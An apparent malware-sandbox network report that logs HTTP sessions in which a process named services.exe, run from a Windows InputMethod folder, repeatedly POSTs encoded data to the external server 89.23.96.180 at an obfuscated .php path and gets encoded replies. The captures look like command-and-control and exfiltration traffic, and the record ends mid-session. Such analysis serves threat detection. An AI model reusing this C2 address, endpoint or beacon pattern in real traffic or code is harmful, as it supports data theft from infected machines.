                                                              Dec 21, 2024 10:49:05.565124035 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:05.686933994 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:05.752641916 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:05.812746048 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:05.932492971 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:05.932600975 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:05.932707071 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:06.052340031 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:06.284308910 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:06.404094934 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:06.404130936 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:06.404160023 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.313076973 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.408974886 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.546442032 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.596409082 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.693037987 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.693944931 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.815530062 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.815638065 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.816715956 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.816920996 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.817017078 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.936728954 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.174614906 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.294380903 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.294418097 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.294454098 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.426383018 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.427432060 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.546104908 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.546205044 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.546477079 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.590140104 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.607136965 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.665997028 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.726881027 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.726979971 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.727204084 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.846673012 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.857913971 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.857975960 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.893526077 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:09.013115883 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.013267040 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.081408024 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:09.201010942 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.201072931 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.201106071 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.930911064 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:10.002809048 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:10.104902983 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:10.166493893 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:10.252789974 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:10.338294029 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:10.408961058 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:10.565146923 CET5003080192.168.2.589.23.96.180

                                                              HTTP Request Dependency Graph

                                                              • 89.23.96.180

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.54971489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:24.543824911 CET421OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 344
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:24.934374094 CET344OUTData Raw: 05 01 04 07 03 0f 01 01 05 06 02 01 02 03 01 04 00 0a 05 0f 02 0c 03 08 00 53 0a 00 06 01 01 54 0f 52 07 0b 02 03 04 07 0d 03 06 03 06 04 06 00 04 53 0c 5a 0f 50 05 00 06 0f 04 06 07 02 06 0c 01 04 0d 01 04 0f 05 06 0b 02 0c 01 0c 02 0b 05 04 07
                                                              Data Ascii: STRSZPSWRU\L}Pk`u^`\yuf||BfYwl|~s^xlRZxYvI}}{StwZu~V@{C\rq
                                                              Dec 21, 2024 10:47:25.857626915 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:26.133721113 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:25 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 35 37 63 0d 0a 56 4a 7d 5c 6f 53 70 5a 79 72 63 5c 7c 61 78 5a 7e 77 5e 50 7c 63 66 52 6d 63 51 59 7d 5c 56 04 60 63 57 0b 6e 72 75 00 77 66 59 59 6a 61 78 01 55 4b 71 42 76 61 77 06 6b 5c 79 07 7c 49 7d 53 79 66 74 41 7e 63 63 49 75 5c 72 5d 77 4f 69 48 6b 71 5f 5c 7e 55 60 0b 7f 64 77 4b 75 5c 7b 06 7c 5b 7d 49 69 59 69 4a 6c 64 6c 43 78 77 74 42 78 54 60 5d 78 61 7b 5b 78 63 5c 06 7c 60 6c 4b 79 67 60 49 7e 4c 67 05 76 71 77 5a 7a 51 41 5b 6b 5e 6b 52 68 62 65 41 76 52 6b 5c 6f 7c 56 01 77 4e 6e 0d 7a 58 6d 49 7e 6f 7a 04 6c 5f 50 4b 76 63 5e 5f 77 62 7b 5d 77 4f 5c 50 7e 5d 7a 06 77 72 6d 4f 61 66 7f 50 7f 55 75 05 77 6f 77 5d 7c 73 6c 03 78 6f 67 03 7b 59 76 02 7c 6d 6f 51 77 5e 7f 5e 7e 62 6d 50 69 6d 63 0a 7b 7d 71 5e 7e 62 76 5c 7b 5d 46 51 6b 55 6b 52 7f 60 60 42 7d 49 5c 4c 7b 7e 68 5f 7b 71 7b 59 7c 62 7f 01 7e 59 7f 0c 7f 5e 53 08 6d 63 6f 5c 7f 71 64 01 74 70 61 51 7b 5c 79 07 76 76 5a 4b 7c 66 68 4e 7d 48 79 0c 77 62 59 01 7c 5c 75 4c 7f 67 50 0c 78 76 78 41 7e 5d 51 04 75 62 71 07 77 [TRUNCATED]
                                                              Data Ascii: 57cVJ}\oSpZyrc\|axZ~w^P|cfRmcQY}\V`cWnruwfYYjaxUKqBvawk\y|I}SyftA~ccIu\r]wOiHkq_\~U`dwKu\{|[}IiYiJldlCxwtBxT`]xa{[xc\|`lKyg`I~LgvqwZzQA[k^kRhbeAvRk\o|VwNnzXmI~ozl_PKvc^_wb{]wO\P~]zwrmOafPUuwow]|slxog{Yv|moQw^^~bmPimc{}q^~bv\{]FQkUkR``B}I\L{~h_{q{Y|b~Y^Smco\qdtpaQ{\yvvZK|fhN}HywbY|\uLgPxvxA~]QubqwOu~arK}RpgsvOYzriG}^[xgxxg|L{CUy\pxsPp^J{gl~r{Mwq^|l]J|wR}qW@uBlN{RRKt`rNyqWH~lPzqbuMcvOVwOzNv@wbSuep~|Wt|R~cxxRcJ{^fISttg^~rvA}Sc{}f}\i|N`|lp`xB~YfxmQx\p|_sD|wQ^}zc|~r|HwMy@z_qJuH`E|v`M~XqBvbUKLqLYfC{vZB}]kJu\iNtO[aT~|d}wwKuOsH{rmG}NyxYZywR{CQKyrR{MT{]NZ{I]^}\gMbrsZj{KdwSqmvBo[lBs[ccaUmXeH~Bj_z\y\}b`g{ZL~Jx^e_tLT\a[sQ|Bv]`olMh`Dy|lZ{^j}mRc^\ibrzSYQTn^jfzScT`Mjc{HiOBln`GRaIPc`JjdlUPc~OP`sFQa{[cpmnbDZ{ZP\Z^|qrQtbYJ|LaMhY~lfxA~Zh\bqb\ta~X~riXjRVjgsv\{POr^icDT{oZWdSUTdISacKQt~{^^FxwlF~bMt_p|kA{^UTPvJ\o]FWT[Xle}_[YgUe|s_G[ZEZtvXcbNS|eYXaS[\oVPo@pRV\eZo~ZDVY@Z~zsWcdAR~aVRn^VTa [TRUNCATED]
                                                              Dec 21, 2024 10:47:26.133739948 CET366INData Raw: 06 5c 4e 56 5c 0c 5d 52 61 60 58 76 5e 7a 77 6e 6d 53 54 6f 65 08 4b 52 4b 78 44 79 5f 5c 54 5b 05 70 40 56 61 54 45 50 5f 0a 53 54 01 6f 4d 57 7f 78 05 69 04 01 5d 63 66 71 06 78 59 65 65 79 51 42 50 6a 01 64 45 5b 72 4a 01 6f 04 54 45 6b 06 76
                                                              Data Ascii: \NV\]Ra`Xv^zwnmSToeKRKxDy_\T[p@VaTEP_SToMWxi]cfqxYeeyQBPjdE[rJoTEkvERdU]Uzon]~\ZXc`FVsoXu{jnd[[L|CzUR^PsKVbPIZT\WXcUV[ftQaZ|_\Xl\sZtvXcbNS|eYXaSaMU\@coeZGlk|_EQWkVpvBjn}HjsQyz}Xja@P|gVSo_RswRkeo~gZ
                                                              Dec 21, 2024 10:47:26.216372967 CET397OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 384
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:26.568432093 CET384OUTData Raw: 58 54 46 54 58 5c 57 53 55 5e 55 5a 54 53 50 52 57 58 5c 58 52 50 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTFTX\WSU^UZTSPRWX\XRPQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY B,119=!,?^0/ W98R#,%15+7+[<><X>!_.#Q,
                                                              Dec 21, 2024 10:47:26.676223040 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:27.035319090 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:26 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0c 21 38 31 52 28 03 28 06 3d 2f 04 1f 2a 58 3a 14 38 32 24 06 35 12 32 5a 28 2d 2c 07 27 3e 2c 04 21 3a 07 10 21 3f 0a 00 2a 1b 2e 58 01 1e 21 40 20 0d 03 57 33 06 34 0c 2a 09 3a 5c 28 10 00 10 27 3c 33 52 26 2a 12 15 2b 14 0a 57 32 03 22 58 2d 3c 3f 1d 3f 00 23 09 24 1c 2b 51 03 1e 25 05 25 2f 27 57 32 0a 2a 06 24 2d 3e 06 20 58 2b 56 2a 28 20 0e 20 38 26 5b 2d 3a 3f 06 3c 2d 26 10 2b 3b 3e 5a 24 02 2c 09 32 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98:!81R((=/*X:82$52Z(-,'>,!:!?*.X!@ W34*:\('<3R&*+W2"X-<??#$+Q%%/'W2*$-> X+V*( 8&[-:?<-&+;>Z$,2#T-,H1]V0
                                                              Dec 21, 2024 10:47:27.209808111 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2100
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:27.565088987 CET2100OUTData Raw: 58 57 43 5e 58 5d 57 55 55 5e 55 5a 54 5b 50 52 57 52 5c 5b 52 55 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XWC^X]WUU^UZT[PRWR\[RUQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY :'2)>)[9/,3<?-!4"2"Q<B<<=<X)%!_.#Q,
                                                              Dec 21, 2024 10:47:27.668298960 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:28.033471107 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:27 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0c 20 28 2a 0b 28 39 23 5b 2a 01 22 50 3d 10 25 04 2c 32 33 16 22 02 29 00 3e 5b 2b 12 30 07 38 01 36 03 31 11 21 3c 23 59 29 31 2e 58 01 1e 21 08 37 33 0f 1f 27 11 33 56 3e 09 3a 5a 28 00 00 13 24 2f 27 53 26 2a 1a 14 3c 04 3f 0d 26 5b 3e 58 2f 11 09 1d 2b 3e 27 08 26 36 2b 51 03 1e 26 12 31 02 34 0c 32 30 29 5f 24 2d 3d 59 37 00 28 0b 3e 16 27 51 20 2b 2e 17 2f 2a 3b 04 28 03 26 12 2a 16 03 06 24 05 28 08 24 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98: (*(9#[*"P=%,23")>[+0861!<#Y)1.X!73'3V>:Z($/'S&*<?&[>X/+>'&6+Q&1420)_$-=Y7(>'Q +./*;(&*$($>#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.54972189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:26.430229902 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:26.783816099 CET2536OUTData Raw: 58 56 43 55 58 5a 52 50 55 5e 55 5a 54 52 50 5c 57 5b 5c 5e 52 55 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCUXZRPU^UZTRP\W[\^RUQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#912:*^,?''-45\&2.Q?<-;*!_.#Q,
                                                              Dec 21, 2024 10:47:27.807076931 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:28.041794062 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:27 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.54972489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:28.329449892 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:28.674526930 CET2532OUTData Raw: 5d 56 43 54 5d 5b 52 57 55 5e 55 5a 54 5b 50 5c 57 5a 5c 5a 52 57 51 5b 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VCT][RWU^UZT[P\WZ\ZRWQ[_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY C.2 V2=*":./30;-^)#/>%2)+]?+5!_.#Q,
                                                              Dec 21, 2024 10:47:29.704356909 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:29.937808990 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:29 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.54973189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:30.237173080 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:30.596349955 CET2536OUTData Raw: 5d 55 46 53 5d 5b 57 51 55 5e 55 5a 54 5a 50 50 57 5c 5c 59 52 5e 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]UFS][WQU^UZTZPPW\\YR^Q__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.W/%-!V>19[-<3$/'.R"/-['1)<'?Z+.<Y+%!_.#Q,"
                                                              Dec 21, 2024 10:47:31.619678974 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:31.857820034 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:31 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.54973789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:32.346628904 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:32.705791950 CET2536OUTData Raw: 5d 56 46 53 5d 57 52 52 55 5e 55 5a 54 5d 50 55 57 52 5c 59 52 52 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VFS]WRRU^UZT]PUWR\YRRQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY 91;%)=2*,, _3+.9Q <5Y&1(B+<[(Y>%!_.#Q,>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.54974389.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:33.170469046 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2100
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:33.518145084 CET2100OUTData Raw: 58 51 46 53 58 5e 57 54 55 5e 55 5a 54 5b 50 56 57 53 5c 5f 52 51 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XQFSX^WTU^UZT[PVWS\_RQQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY 9!0W1=6=W5^-?<]';.+9Q7?>&!"+$#<.?)%!_.#Q,*
                                                              Dec 21, 2024 10:47:34.548418999 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:34.782004118 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:34 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0b 20 38 35 55 3f 03 37 12 29 3f 2d 0d 2a 3e 3e 5c 38 0b 37 5d 22 2c 07 06 29 03 27 5b 33 00 37 1e 22 5c 29 10 22 3f 2b 1d 2a 1b 2e 58 01 1e 22 1b 37 33 0c 0c 25 2f 34 0a 29 37 2a 5e 3c 2d 3a 10 26 3f 24 0f 25 3a 3c 15 3d 2a 24 51 32 3d 07 00 2c 06 2c 01 2b 2d 33 0d 33 26 2b 51 03 1e 26 5d 25 2f 27 55 24 33 26 03 26 00 25 1b 37 07 37 57 3e 3b 2c 0e 37 05 22 16 38 29 2c 59 28 03 07 04 2b 2b 21 01 33 02 20 0c 25 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98: 85U?7)?-*>>\87]",)'[37"\)"?+*.X"73%/4)7*^<-:&?$%:<=*$Q2=,,+-33&+Q&]%/'U$3&&%77W>;,7"8),Y(++!3 %#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.54974489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:33.509001970 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:33.861929893 CET2536OUTData Raw: 5d 53 46 55 58 5e 52 53 55 5e 55 5a 54 5d 50 55 57 5a 5c 59 52 56 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
